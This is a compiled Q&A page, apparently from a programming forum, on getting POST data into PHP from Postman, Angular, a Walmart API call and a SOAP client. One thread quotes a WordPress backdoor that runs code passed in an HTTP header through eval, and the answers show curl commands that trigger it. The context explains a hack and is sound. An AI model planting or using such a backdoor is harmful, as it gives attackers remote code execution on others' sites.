I am developing the client side of a web application in iOS/Swift, and right now I am testing the part that communicates with the server. I setup a basic website on localhost at:
http://localhost/~username/ConnectivityTest/login
(which corresponds to /Users/username/Sites/ConnectivityTest/login on my Mac's file system).
The server side script (index.php on the directory above) is:
<?PHP
$userId = $_POST["userId"];
$password = $_POST["password"];
if (empty($userId) || empty($password)){
echo "Error: empty post variables";
}
else{
// Process credentials...
I am using the NSURLSession API on iOS, but I noticed that no matter how I configure my requests, even though the connection succeeds (i.e., returns an http code of 200 and the response body as data), the POST variables are unavailable (empty) on the server side.
So I decided to try sending the request manually using Postman on the browser (to try to rule out any mistakes on my iOS/Swift code), but I don't know how I should configure it (I am not versed in HTTP, it all is still a bit confusing to me):
Should I set the Content-Type header to application/json, application/x-www-form-urlencoded, or what?
Should I send the body data as form-data, x-www-form-urlencoded or raw?
In Postman, I set the body data (raw) as follows:
{
"userId":"my-user-name",
"password":"123456"
}
Alternativley, as form-data, it is:
userId my-user-name [Text]
password 12345 [Text]
As x-www-form-urlencoded, it is:
userId my-user-name
password 12345
Everything I try gives me the response "Error: empty post variables" that I set in my code's error path (i.e., $_POST['userId'] or $_POST['password'] are empty).
If, instead, I pass the variables as URL parameters:
http://localhost/~username/ConnectivityTest/login/index.php?userId=my-user-name&password=12345
...and access them in the script as &_GET['userId'] and $_GET['password'], it works fine.
what am I missing?
UPDATE: I created an HTML file in the same directory as the php file:
<html>
<body>
<form action="index.php" method="post">
User name: <input type="text" name="userId"><br>
Password: <input type="text" name="password"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
If I load the above page in a browser, fill in the fields and submit the form, the $_POST variables on my php script get the correct values. So the php code is correct, and I am setting up my request wrong in Postman (still don't know why).
UPDATE 2: Just in case there was a problem with localhost, I moved the script to a shared wb hosting service that I control, but the result is the same.
UPDATE 3: I must have missed it somehow before, but there is ONE setup that I got working:
Headers: Content-Type application/x-www-form-urlencoded
Body ("raw"): userId=my-user-name&password=123456
However, this restricts me to flat lists of key/value; If I wish to send more structured (i.e., nested) data to the server I need JSON support...
After searching here and there, I discovered that the post body data gets into the $_POST variables only when you send them as a form -i.e., application/x-www-form-urlencoded- (I guess that is what $_POST stands for, not the method used for the request). Correct me if I'm saying something that isn't correct.
When using a Content-Type of application/json, code like the following does the trick:
$data = json_decode(file_get_contents('php://input'), true);
$userId = $data["userId"];
$password = $data["password"];
I guess this is very basic stuff, but then again, my knowledge of HTTP is very limited...
A mistake I made when first using Postman was setting the params when using the POST method which would fail. I tried your Update 3 which worked and then I realized there were key value pairs in the Body tab.
Removing the params, setting the Body to "x-www-form-urlencoded" and adding the variables to be posted here works as expected.
My oversight was I figured there would be a single section to enter the values and the method would determine how to pass them along which makes sense in case you would like to send some parameters in the URL with the POST
Comment by #FirstOne saved me. I added a forward slash to the URL and it solved the problem. This way, my php script could detect the request as POST even without setting header to
Content-Type application/x-www-form-
urlencoded
I also tested my code without a header and it works fine. I tested with Content-type: application/json too and it works fine.
if($_SERVER['REQUEST_METHOD] = 'POST') { echo 'Request is post'; }
My script returned 'Request is post' using RESTEasy - Rest client on Chrome.
Thanks, FirstOne.
Related
I am trying to post data from Angular to PHP.
Angular Post Request
var body = { "action":"getvouchernumber","vouchertype": vtype, "vmonth": vmonth, "vyear":vyear };
return this.http.post(this.BaseURI+'voucherprocessing.php',body);
Output As Shown In Network Tab of Developer Mode
Headers on PHP Page
header("Access-Control-Allow-Origin: *");
header("Content-Type: application/json; charset=UTF-8");
header("Access-Control-Allow-Methods: POST");
header("Access-Control-Max-Age: 3600");
header("Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With");
Getting Data in PHP
$data = file_get_contents("php://input");
Output
But when I try to get any value of the object and set it to a variable, it doesn't work.
$action = $data->action
I also tried doing
json_decode(file_get_contents("php://input"));
but that returns an error too.
In response to #Tiago's post, I added json_decode($data, true) and tried to get value by $data->action which resulted in following
The value is correct in text field but it is being shown as an error.
And if I don't add second parameter to json_decode, it returns still null. The PHP version is 5.6.31
try dumping data variable in php by var_dump($data) and see you are able to receive data in php correctly or not,by viewing the response in console.
Check if you are able to encode formData correctly on angular and use this._http.post("voucherprocessing.php",formDataVariable); to submit form.
Also it may happen relative route for your file may not be working as angular has its own way of setting routes,use absolute route instead like "http://localhost/path/to/your/php/file".
Due to security reasons (everyone has access to the Angular code), Angular doesn't communicate directly with a Database. Instead, it uses HTTP Requests and HTTP Responses to a Server / API (REST, GraphQL) that can be built using PHP (like in your case) but could be using, for instance, NodeJS. Then, this API can interact with the Database (could be doing something different too, like simply uploading files).
When it comes to HTTP Requests to REST API it's important to note that we will need to know the URL (API Endpoint), the HTTP Verb we want to use (in this case POST) and can also possible to send Header ({"Content-Type": "application/json") and a Body (to send some piece of information - note that this won't be possible using the HTTP Verb GET).
In this particular case, you've used the HttpClientModule's post() method to send the data to the server. Will assume you have the right URL given as the first parameter and can also see the body in the second parameter.
So, now the problem can only happen in the PHP side. In order to get the data POSTed from Angular and associate it to a variable, use
$postdata = file_get_contents("php://input");
As this data comes in JSON format and JSON data is not recognized by PHP, you need to then extract it / convert it into an array
$request = json_decode($postdata, TRUE);
So now it should be straightforward PHP Arrays. Of course you can then had conditions / validations throughout the way to ensure these variables ($postdata and $request) always hold data or else give a specific error.
As in your comment to this answer you mention that $request is returning null, there's a question already addressing it from where you can read more about it.
So our website unfortunately got hacked.
They created a file in our wp-admin directory called wp-update.php containing this code:
<?php #eval($_SERVER['HTTP_4CD44849DA572F7C']); ?>
My question is how can the hacker pass in his script using $_SERVER?
Yes a hacker can send data into $_SERVER, it contains HTTP headers (cf. the documentation) with a simple curl command you can inject data.
curl -H '4CD44849DA572F7C: echo "hello from server";' http://example.com
Properties of the $_SERVER superglobal with names starting with HTTP_ are just representations of the HTTP request headers.
Since request headers are completely under the control of whoever is making the request, it is trivial to insert data there.
Any HTTP client will let the attacker specify whatever headers they like. An example in cURL's command line client would look like:
curl -H "4CD44849DA572F7C: code goes here" http://example.com/your-hacked.php
There's a lot to unpack here. First of all, I've edited the title because I realize while eventually my REST request will be implemented into PHP code, right now I've stripped this down to Postman to test JUST the REST, so I've stripped it as low and basic as possible. I can officially say the problem is with my request.
Basically, I'm making a POST request and also testing with a PUT request to Walmart's API using the "new" OAuth authentication. Sounds grand. GET works BEAUTIFULLY in Postman and in my actual PHP code. POST and PUT immediately return the exact same error, no matter what and how I do: 400 Bad Request, Invalid URL. In the case of my PUT test, which I was doing because it's a simpler and faster text with far less XML to try to comb through, here's the exact response in HTML headers:
<HTML>
<HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD>
<BODY>
<H1>Invalid URL</H1>
The requested URL "http://%5bNo%20Host%5d/v3/inventory?", is invalid.
<p>
Reference #9.c9384317.1556319123.8c89b8dc
</BODY>
</HTML>
I have left testing in PHP through my server and moved into Postman to try to locate the exact issue I'm having, and GET requests work beautifully. I am generating a new Token every 15 minutes or so. I have done... SO many minor changes, but the way the Feed examples and requests work, for all that I can tell I'm doing everything right. I honestly think I'm losing my marbles at this point.
What is most frustrating to me is that GET works. My TOKEN is working. My OAuth is working just fine. A lot of the headers that GET uses for the Walmart API are the exact same between PUT/POST/GET. The difference here is ONLY that the link has query parameters AND XML being shoved into the body. Edit: What I mean is that my headers do not change between the GET and the POST; the only thing that changes in what I am supplying is that XML is being sent in the body, and that query params are required. This is the only thing that changes between a successful GET and an unsuccessful 400 bad request PUT/POST. This leads me to believe something is wrong with how I'm processing the query params or my XML, but considering in the below example I've copy/pasted the XML... I'm not sure. It is an existing item in our catalog, I know for a fact.
Something I have noticed that I'm not quite knowledgeable enough to know if it's an issue or not with Postman is that Walmart's API requests that content-type be multipart/form-data. I've noticed it uses the term "example" when stating this, however, it usually says "this or this" if it'll accept something else. If I switch content-type in Postman to multipart/form-data, however, the Body automatically becomes raw: text instead of raw: XML(application/xml) or text/xml. If I try to swap the raw to those types, it flips my content-type automatically to application/xml, so that's a little... hinky.
I am not going through a Proxy. I've turned off Global Proxy Configuration and Use System Proxy. Request timeout is set to 0. There's nothing Client Certificates. I mean, GET works, and my Token is successfully generated via outside PHP code (not in Postman, couldn't get that to work, said heck it).
HEADERS
PUT URL: https://marketplace.walmartapis.com/v3/inventory?sku=0xyz0
AUTHORIZATION
Bearer Token: Bearer Basic --insert token here--
WM_SVC.NAME: Walmart Marketplace
WM_QOS.CORRELATION_ID: randomString123
WM_SEC.ACCESS_TOKEN: --insert token here--
Accept: application/xml
Host: https://marketplace.walmartapis.com
Content-type: multipart/form-data
BODY
raw: XML(application/xml)
<?xml version="1.0" encoding="UTF-8"?>
<inventory xmlns="http://walmart.com/">
<sku>0xyz0</sku>
<quantity>
<unit>EACH</unit>
<amount>7</amount>
</quantity>
<fulfillmentLagTime>1</fulfillmentLagTime>
</inventory>
Exact response
400 Bad Request
<HTML>
<HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD>
<BODY>
<H1>Invalid URL</H1>
The requested URL "http://%5bNo%20Host%5d/v3/inventory?", is invalid.
<p>
Reference #9.c9384317.1556320429.8ca752c4
</BODY>
</HTML>
Please send help, I think I've been staring at this so long I'm going to leave this physical world behind. Walmart relatively recently updated their authentication to OAuth and they've made vague passes at saying their old authentication will be deprecated and phased out, so I obviously want to try to get this to work.I tried to copy paste everything as best as possible. That XML is copy-pasted almost letter for letter from their example, with my own product switched in.
Also, the reference number down there always changes every time I run this, so it's not something I can actually look up. I've only supplied the Postman side of things because frankly if I can get that to work, my PHP will be fine, I've already knocked out some minor issues with the successful GET request.
If it's a semi-colon issue, I'll scream.
API Documentation: https://developer.walmart.com/#/apicenter/marketPlace/latest#updateInventoryForAnItem
Well, I've figured it out.
You'll notice I'm required to supply a "Host" with my headers. That host is replacing my URl that I'm trying to connect to via POST/PUT/GET, so if my Host is https://marketplace.walmartapis.com, then my request URL is https://https://marketplace.walmartapis.com.
Once I took the https:// out of the host, the entire thing granted me a 200 response. The times I got a correct GET response, I had actually copy-pasted the correct HOST without the HTTPS by pure chance, so I completely missed this between my two separate test cases.
In SOAP UI I am able to pass a few request properties, specifically Username, Password and WSS-Password Type. They are marked in the screenshot below by a red box:
I've tried passing these values in PHP as the second parameter of the SoapClient function like so:
$soap = new SoapClient('https://rev-int.api.us.fleetmatics.com/Vehicle/SageQuest/VehicleService.svc?wsdl',
array("Username" => "blah#example.com",
"Password" => "notarealpassword",
"WSS-Password Type" => "PasswordText"));
But I get the security error: An error occurred when verifying security for the message.
The WSDL I'm calling itself is here, though my question is about passing the request properties this way in general, really: https://rev-int.api.us.fleetmatics.com/Vehicle/SageQuest/VehicleService.svc?wsdl
It is likely that a security header with username and password is sent along with the message itself, but you can not see this header in the normal window in SoapUI.
Click "http log" in the bottom panel of SoapUI to see the whole communication. Look thoroughly for Header ithems.
If any header ithems, they must be set before your function SOAP call in PHP, but after you've constructed the client.
Use __ setSoapHeaders() to set headers in PHP
I was also getting that security error.
I used the soapui tool as well. But i had better success with the Chrome App called Boomerang.
You need to choose WSS PasswordText under Auth and then everything just seems to work.
Then you can even copy the xml that Boomerang generates into PHP and it works as well.
I use Postman (the Chrome app) to send POST data to a URL but the POST data are never received by the PHP file, no matter how I change the content-type before sending. Is there a server setting on Apache that stops post data from external sources?
This is the URL:
http://friendesque.com/arranged/handler.php
And this is the content of the handler.php file:
<?php
echo("Inside file");
echo("JSON:");
$json = file_get_contents('php://input');
echo($json);
echo("POST:");
print_r($_POST);
echo("GET:");
print_r($_GET);
?>
In order for data to be available in $_POST array, the following conditions should be met:
Request must be sent with POST HTTP method
Content-Type header must be set to application/x-www-form-urlencoded
Request payload (body) must be in the form of URL-encoded parameters, e.g.
param1=a¶m2=b
I sent to your URL a request that meets those 3 conditions and got my data available in $_POST array.
Use file name like /index.php . It will work !!